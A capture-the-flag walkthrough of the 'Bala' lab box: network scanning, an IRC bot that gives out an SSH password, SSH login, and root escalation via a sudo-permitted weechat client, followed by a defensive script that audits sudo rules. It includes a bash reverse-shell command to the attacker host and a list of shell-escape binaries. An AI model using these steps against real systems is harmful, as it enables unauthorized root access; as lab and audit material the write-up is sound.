Information gathering

```cmd
┌──(root㉿kali)-[~]
└─# arp-scan -l | grep PCS
192.168.12.142  08:00:27:64:30:cb       PCS Systemtechnik GmbH

┌──(root㉿kali)-[~]
└─# IP=192.168.12.142
```
```cmd
┌──(root㉿kali)-[~]
└─# nmap -sV -sC -A $IP -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-07 21:10 CST
Nmap scan report for 192.168.12.142
Host is up (0.00059s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: IRC\xE9\x80\x9A\xE4\xBF\xA1\xE5\x8D\x8F\xE8\xAE\xAE - \xE6\x9A\x97\xE9\xBB\x91\xE4\xB8\xBB\xE9\xA2\x98
6667/tcp open  irc
| irc-info: 
|   users: 2
|   servers: 1
|   chans: 4
|   lusers: 2
|   lservers: 0
|   server: irc.local
|   version: InspIRCd-3. irc.local 
|   source ident: nmap
|   source host: 192.168.12.55
|_  error: Closing link: (nmap@192.168.12.55) [Client exited]
MAC Address: 08:00:27:64:30:CB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: Host: irc.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.58 ms 192.168.12.142

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.02 seconds
```

Port 6667 is running an InspIRCd service; connect to it with HexChat:

PenTest_MazeSec_Bala-1

PenTest_MazeSec_Bala-2

Once it is configured like this, just click Connect.

PenTest_MazeSec_Bala-3

In the pop-up window, tick "Open the channel list" to see which channels exist.

PenTest_MazeSec_Bala-4

Then join them one by one.

Right after logging in we get this information:

PenTest_MazeSec_Bala-5

Then check the four channels on the left one by one; every channel's operator is bala, so send bala a private message:

```text
<root> 111
<bala> 未知命令,可用命令: getpassword, help, info
<root> getpassword
<bala> 密码: ai01ClGAXoYpeevwNMS1
<bala> 此密码为敏感信息,请妥善保管
<root> help
<bala> 可用命令:
<bala> getpassword - 获取密码
<bala> help - 显示帮助
<bala> info - 机器人信息
* DCC CHAT '' to bala timed out, aborting.
<root> info
<bala> Simple IRC Bot v2.0
<bala> 功能: 密码管理、频道通信
```

The password is presumably an SSH credential, and the nickname fzer seen right after logging in looks suspicious, so guess it is the username and try to log in:

```cmd
┌──(root㉿kali)-[~]
└─# ssh fzer@$IP
The authenticity of host '192.168.12.142 (192.168.12.142)' can't be established.
ED25519 key fingerprint is SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:2: [hashed name]
    ~/.ssh/known_hosts:4: [hashed name]
    ~/.ssh/known_hosts:5: [hashed name]
    ~/.ssh/known_hosts:12: [hashed name]
    ~/.ssh/known_hosts:13: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.12.142' (ED25519) to the list of known hosts.
fzer@192.168.12.142's password: 
Linux Bala 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Nov  7 11:31:34 2025 from 192.168.12.55
fzer@Bala:~$ id
uid=1000(fzer) gid=1000(fzer) groups=1000(fzer)
```

Privilege escalation

List the commands the current user is allowed to run through sudo:

```cmd
fzer@Bala:~$ sudo -l
[sudo] password for fzer: 
Matching Defaults entries for fzer on Bala:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fzer may run the following commands on Bala:
    (ALL) PASSWD: /usr/bin/weechat
```

weechat is a command-line IRC client; launch it as root with sudo /usr/bin/weechat

PenTest_MazeSec_Bala-6

Running /exec -o /bin/bash produces no output, so try a reverse shell instead:

```text
/exec bash -c 'bash -i >& /dev/tcp/192.168.12.55/4444 0>&1'
```

This gives us a root shell.

PenTest_MazeSec_Bala-7
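The root cause of this escalation is the sudo rule itself: weechat is an interactive program with a built-in command runner (/exec), so granting it as root is equivalent to granting a root shell. The following script is an added example for the defender's side and is not part of the writeup; it parses `sudo -l` output (the box's rule is reproduced as a constructed sample, plus one hypothetical systemctl rule for contrast) and flags rules that hand out a program with a shell escape. The list of such binaries and the severity scheme are illustrative assumptions, not an exhaustive catalogue.

```python
import re

# Constructed sample: the rule from the writeup plus a hypothetical second rule.
SAMPLE_SUDO_L = """
Matching Defaults entries for fzer on Bala:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User fzer may run the following commands on Bala:
    (ALL) PASSWD: /usr/bin/weechat
    (root) NOPASSWD: /usr/bin/systemctl restart apache2
"""

# Illustrative (assumed, not exhaustive) list of programs that let the invoking
# user run arbitrary commands from inside; weechat's /exec is the one used above.
SHELL_ESCAPE_BINARIES = {
    "/usr/bin/weechat": "/exec runs arbitrary commands as the sudo target user",
    "/usr/bin/vim": ":!cmd shell escape",
    "/usr/bin/less": "!cmd shell escape",
    "/usr/bin/python3": "-c / interactive interpreter",
}

# One sudo rule line: "(runas) TAG: TAG: command args"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.+?)\s*$")


def parse_sudo_rules(text):
    """Return the rule lines that follow the 'User X may run' header."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        cmd = m.group("cmd")
        rules.append({
            "runas": m.group("runas").strip(),
            "tags": re.findall(r"([A-Z_]+):", m.group("tags")),
            "cmd": cmd,
            "binary": cmd.split()[0],
        })
    return rules


def audit_rules(rules):
    """Flag rules whose target program gives the caller a command runner."""
    findings = []
    for r in rules:
        reason = SHELL_ESCAPE_BINARIES.get(r["binary"])
        if r["cmd"] == "ALL":
            reason = "ALL grants any command"
        if reason is None:
            continue
        # Running as ALL or root means the escape yields a root shell.
        privileged = r["runas"] == "ALL" or r["runas"].startswith("ALL") or r["runas"] == "root"
        findings.append({
            "binary": r["binary"],
            "runas": r["runas"],
            "nopasswd": "NOPASSWD" in r["tags"],
            "severity": "HIGH" if privileged else "MEDIUM",
            "reason": reason,
        })
    return findings


if __name__ == "__main__":
    for f in audit_rules(parse_sudo_rules(SAMPLE_SUDO_L)):
        pw = "NOPASSWD" if f["nopasswd"] else "password required"
        print(f"[{f['severity']}] {f['binary']} as ({f['runas']}), {pw}: {f['reason']}")
```

Run it against the real output of `sudo -l` on a host (or against a sudoers dump) to spot the same class of rule. The fix on this box is to remove the weechat rule entirely: an IRC client never needs root, and if an admin genuinely needs some privileged action, it should be a narrow non-interactive wrapper rather than a program that can spawn commands.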